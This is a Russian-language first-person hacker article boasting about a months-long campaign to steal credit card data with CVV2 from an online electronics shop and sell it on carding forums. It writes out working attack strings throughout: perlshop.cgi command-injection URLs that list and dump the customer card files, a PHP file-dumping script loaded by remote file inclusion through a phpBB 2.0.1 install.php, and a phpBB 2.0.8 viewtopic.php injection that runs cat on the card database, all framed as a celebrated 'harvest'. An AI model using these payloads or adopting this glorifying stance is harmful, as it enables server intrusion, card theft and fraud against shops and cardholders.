|
В глубоком моем детстве, когда еще кучка уродов не развалила СССР, услышал я фразу "Битва за урожай". И сейчас, когда я пишу данную статью, понял я, что именно это фраза и станет ее заглавием.
Ты наверное знаешь, что заработок хакера, дело эпизодическое и непостоянное, в то же время деньги на еду, пиво и другие радости нужны всегда. Большинство клиентов, обращающихся ко мне просит взломать сразу paypal.com или ebay.com, предполагая, наверное, что как минимум божественное происхождение хакеров и мое в частности.
Постоянно же иметь свои кровные хакер может только в случае если получит постоянный доступ к торговым тележкам нескольких средних магазинов, ежедневно снимая урожай с них и обменивая его на вечнозеленые единицы на одном из кардерских форумов, например таких, как Carder-World.ru. Сегодня усилиями ФСБ закрыты практически все кардерские форумы, в том числе и Carder-World.ru , лучше б вахабитов и боевиков ловили, "герои плаща и кинжала".
И я хочу рассказать историю про долгое состязание с админом одного такого шопа, торгующего электроникой.
Эпизод первый.
Больше года назад обнаружил я уязвимость в скрипте perlshop.cgi version = 3.1
http://www.xakep.ru/post/21567/default.asp
суть бага заключалось в том, что можно было выполнять команды на сервере:
/perlshop.cgi?ACTION=enter&thispage=|ls;&ORDER_ID=!ORDERID!
просмотр исходника показывал что открытие файлов в директории catalog происходит без проверки на символы | ;
if (defined($input{'THISPAGE'})) { ### Send a catalog page back with the unique ID set
$prev_page = ""; $next_page= "";
if ($add_navigation eq 'yes') {
$catalog_page = "$catalog_directory/$input{'THISPAGE'}";
if (-e $catalog_page) {
open(TEMPLATE, $catalog_page) || &err_trap("cannot open template file: $catalog_page");
$temp = <TEMPLATE>;
if ($temp =~ /<(\!\-\-)?PSTAG\s+prevpage\s*=\s*\"?([^\"]+?)\"?\s+nextpage\s*=\s*\"?([^\"]+?)\"?\s*(\-\-)?>/i
Просмотрев все бажные шопы, мне удалось найти один, в котором админ не смотря на запрет, сохранял кредитные карты с cvv2. Зная, что база с кредами храниться по умолчанию в директории customers, я ежедневно забирал новый урожай таким нехитрым способом:
/perlshop.cgi?ACTION=ENTER&thispage=|cat%20customers/*;&ORDER_ID=!ORDERID!
К сожалению на сервере не было ни wget ни links, залить shell и закрепиться там я не мог.
Но счастье мое длилось недолго, спустя три месяца админ шопа почувствовал неладное, и однажды загрузив урл вместо кред я увидел "птицу Обломинго". Админ сменил тележку на version = 4.4.0. Найдя ее в инете и просмотрев исходники я понял, что с ней мне радости не будет, | резался:
open(TEMPLATE, $catalog_page) or
error_trap("cannot open template file $catalog_page : $!");
----------
удалено
----------
# Remove invalid characters from the THISPAGE parameter
$input{'THISPAGE'} =~ s/[|()<>;&]//g;
Правда в скрипте нет проверки на "null-byte poison". Но это как я понял, связано с тем что thispage в скрипте должен открывать файлы только из catalog - open(TEMPLATE, $catalog_page).
Эпизод второй.
Голод и холод заставляет людей думать интенсивнее. Поняв, что главный вход мне отрезан, я решил проверить запасной. Пробив ip сервера я увидел, что на нем числятся еще сто с лишним сайтов. Это уже давало шанс.
Началась тупая работа по просмотру сайтов. И вот на одном из них обнаружился PhpBB 2.0.1. Найдя описание бага я быстро сваял functions_selects.php подгружаемый бажным скриптом форума install.php:
<?php
$handle=opendir(' /');
echo "Directory handle: $handle\n";
echo "Files:\n";
while ($file = readdir($handle)) {
print "$file\n";
$f=fopen("/$file","r");
fpassthru($f);
}
closedir($handle);
?>
Залив его к себе на сайт durito.narod.ru в директорию includes и выполнив команду
/forum/install.php?m=http://durito.narod.ru/ я получил листинг корня. Изменяя путь и заливая измененные файлы на durito.narod.ru я добрался до заветной директории customers и ее богатств. Жизнь налаживалась.
Но ненадолго, через пять месяцев бажный форум исчез.
Эпизод третий.
Кушать хочется всегда. И я стал опять шерстить сайты сервера на наличие багов. И вновь удача PhpBB 2.0.8. А тут как раз обнаружена sql-инъекция в форумах до PhpBB 2.0.10. Разобравшись с описанием уязвимостью я вновь попадаю во внутрь сервера. Но здесь меня ждал первый облом, папка customers оказалось пустой. Второй облом не заставил себя ждать, просмотр файлов в юзерских директориях /home/имя_юзера/ тоже закрыли. Просматривать файлы можно было только в /public_html/. Тогда я решил глянуть исходники perlshop.cgi и понял почему не было кред. Админ перенес базу в /home/ имя_юзера/data/customers, к счастью я имел возможность просматривать содержимое в ней.
Открыв viewtopic.php?t=7&highlight=%2527.$poster=%60$cmd%60.%2527&cmd=cat%20/home/ имя_юзера/data/customers/*;
я очень удивился, в базе лежало всего 2 креды. Решив, что шоп разорился, я ушел спать.
Через несколько дней я вернулся, и так же увидел, что в тележке лежит несколько кред, но это были ДРУГИЕ КРЕДЫ! Я начал вести наблюдение за хранилищем и понял что около 7.30 утра админ удаляет все данные о транзакциях за сутки из папки customers, исключение делалось только в воскресение, так что это был единственный день в неделе когда я не вставал в 7 утра и не бежал к компу, что бы забрать урожай быстрее админа. Так мы с ним жили "душа в душу" еще полгода, я вставал на полчаса раньше его, а как гласит народная пословица: "кто рано встает - тому бог подает".
И вот вчера, какая-то сволочь, вместо PhpBB 2.0.8 поставила на своем сайте vBulletin Version 3.0.8. И опять розовая птица Обломинго махнула мне крылом. Но хакер - птица терпеливая и Main Kampf за урожай с админом еще не завершен.
З.Ы. Бой продожается, сегодня я нашел еще одну дырку у хостера, но о ней раскажу потом
Твой bug Durito.
_________________
EAT THE RICH!
|
